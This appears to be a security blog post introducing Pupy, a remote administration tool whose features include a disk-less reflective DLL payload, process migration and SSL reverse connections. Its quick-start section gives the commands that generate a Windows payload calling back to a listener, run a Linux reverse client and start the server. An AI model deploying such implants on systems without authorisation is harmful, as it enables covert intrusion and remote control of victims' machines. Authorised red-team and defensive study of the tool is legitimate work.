Not so Ordinary Remote Administration Tool – Pupy

Pupy is a remote administration tool with an embeded Python interpreter,
allowing its modules to load python packages from memory and
transparently access remote python objects. The payload is a reflective
DLL and leaves no trace on disk.

Features :

  • On windows, the Pupy payload is compiled as a reflective DLL and the
    whole python interpreter is loaded from memory. Pupy does not touch the
    disk 🙂
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py,
    .pyc) and compiled python C extensions (.pyd). The imported python
    modules do not touch the disk. (.pyd mem import currently work on
    Windows only, .so memory import is not implemented).
  • modules are quite simple to write and pupy is easily extensible.
  • Pupy uses rpyc and a module can directly access python objects on the remote client
    • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
  • communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
  • all the non interactive modules can be dispatched on multiple hosts in one command
  • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output 🙂
  • commands aliases can be defined in the config

Quick start

In these examples the server is running on a linux host (tested on kali linux) and it’s IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload

for Windows

./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux

pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

start the server

  1. eventually edit pupy.conf to change the bind address / port
  2. start the pupy server :

 ./pupysh.py

Download & learn more:

Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

How to Install Kali Linux on VirtualBox [Windows Host] in 2020

Kali Linux is a Debian based Linux distribution, released on the 13th March 2013 as a complete rebuild of BackTrack Linux. It is one of...

Acunetix v13 Release Introduces Groundbreaking Innovations

The newest release of the Acunetix Web Vulnerability Scanner further improves performance and premieres best-of-breed technologies London, United Kingdom – February 5, 2019 – Acunetix,...

What is Ethical Hacking, how to be an Ethical Hacker

Hacking is the process of discovering vulnerabilities in a system and using these found vulnerabilities by gaining unauthorized access into the system to perform...

Basic steps to ensure security Online!

Security concerns are growing day by day due to the growing interconnectivity and technology. Drastic things can happen if you be a little careless...